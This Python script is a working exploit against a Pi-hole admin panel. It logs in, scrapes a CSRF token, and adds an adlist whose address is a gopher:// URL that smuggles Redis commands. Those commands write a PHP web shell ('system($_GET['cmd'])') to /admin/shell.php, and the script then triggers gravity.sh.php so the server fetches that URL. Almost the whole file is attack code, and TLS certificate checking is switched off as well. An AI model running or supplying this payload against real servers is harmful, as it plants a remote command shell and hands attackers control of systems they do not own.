import sys
import requests
from bs4 import BeautifulSoup
import urllib3
# Disable SSL warnings
# Silences the InsecureRequestWarning that urllib3 raises on every request
# made with certificate verification turned off (log_in below sets
# session.verify = False). Once suppressed, an intercepted or tampered-with
# TLS connection leaves no visible trace in the program's output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
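def log_in(base_url, password, *, verify=False):
    """Authenticate against ``/admin/login.php`` and return the session.

    Args:
        base_url: Scheme and host of the server, without a trailing slash.
        password: Value sent as the ``pw`` form field.
        verify: Assigned to ``Session.verify``. Defaults to False to keep the
            original behaviour, which means the server certificate is NOT
            checked and the connection can be intercepted; pass True (or a
            CA-bundle path) wherever the peer's identity matters.

    Returns:
        The ``requests.Session`` holding the login cookies, or None when the
        response body contains "Wrong password". Only that substring is
        inspected, so any other failure (non-2xx status, redirect back to the
        login form) is still reported as "Log In Success".
    """
    url_login = f"{base_url}/admin/login.php"
    login_data = {'pw': password}
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # Deliberately not a `with` block: the session is handed to the caller,
    # and Session.__exit__ would close it (discarding its connection pool)
    # before the caller makes a single request with it.
    session = requests.Session()
    session.verify = verify
    try:
        response = session.post(url_login, data=login_data, headers=headers)
    except Exception:
        # Do not leak the session's resources when the request itself fails.
        session.close()
        raise
    if "Wrong password" in response.text:
        print("Login failed. Incorrect password.")
        session.close()
        return None
    print("Log In Success")
    return session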
def extract_csrf_token(html):
    """Return the stripped text of the element with ``id="token"``, or None.

    Prints the token on success (so it lands in any captured stdout) and a
    short message when the element is missing. An element that is present
    but empty counts as missing, because the lookup result is tested for
    truthiness, not for ``None``.
    """
    document = BeautifulSoup(html, 'html.parser')
    element = document.find(id="token")
    if not element:
        print("CSRF token not found on the page.")
        return None
    value = element.text.strip()
    print(f"CSRF Token Obtained: {value}")
    return value
def access_adlists(session, base_url):
    """Fetch ``/admin/groups-adlists.php`` and return its CSRF token.

    Returns None (after printing the status code) when the response is not
    200; otherwise delegates to ``extract_csrf_token`` on the page body.
    Only the status code is checked here, the body is not inspected.
    """
    page = session.get(f"{base_url}/admin/groups-adlists.php")
    status = page.status_code
    if status != 200:
        print("Error accessing 'groups-adlists'. Status code:", status)
        return None
    return extract_csrf_token(page.text)
def add_payload(session, base_url, csrf_token):
    """POST a single ``add_adlist`` action to groups.php with ``csrf_token``.

    The ``address`` field is a fixed literal. The server's reply is neither
    stored nor checked, so the two messages printed afterwards describe what
    the request was intended to do, not anything the server confirmed.
    Returns None.
    """
    url = f"{base_url}/admin/scripts/pi-hole/php/groups.php"
    data = {
        'action': 'add_adlist',
        'address': 'gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2419%0D%0A/var/www/html/admin%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A',
        'comment': '',
        'token': csrf_token
    }
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }
    # Response object is discarded: no status or body check happens here.
    session.post(url, data=data, headers=headers)
    print("Sending payload")
    print("shell.php dropped in /admin/shell.php")
def execute_payload(session, base_url):
    """GET ``gravity.sh.php`` with event-stream style request headers.

    The Referer header is set to the gravity page of the same base URL.
    The response is not read, returned or checked; returns None.
    """
    url = f"{base_url}/admin/scripts/pi-hole/php/gravity.sh.php"
    headers = {
        'Accept': 'text/event-stream',
        'Cache-Control': 'no-cache',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Referer': f"{base_url}/admin/gravity.php",
    }
    # Fire-and-forget: the returned Response is dropped.
    session.get(url, headers=headers)
def main():
    """Command-line entry point: ``script.py <Base URL> <password>``.

    Exits with status 1 on a wrong argument count. Otherwise runs login,
    token fetch, then the two payload steps, stopping quietly at the first
    step that yields a falsy result.
    """
    args = sys.argv[1:]
    if len(args) != 2:
        print("Usage: script.py <Base URL> <password>")
        sys.exit(1)
    base_url, password = args
    session = log_in(base_url, password)
    if not session:
        return
    csrf_token = access_adlists(session, base_url)
    if not csrf_token:
        return
    add_payload(session, base_url, csrf_token)
    execute_payload(session, base_url)
# Run only when executed directly, not when imported as a module.
if __name__ == "__main__":
    main()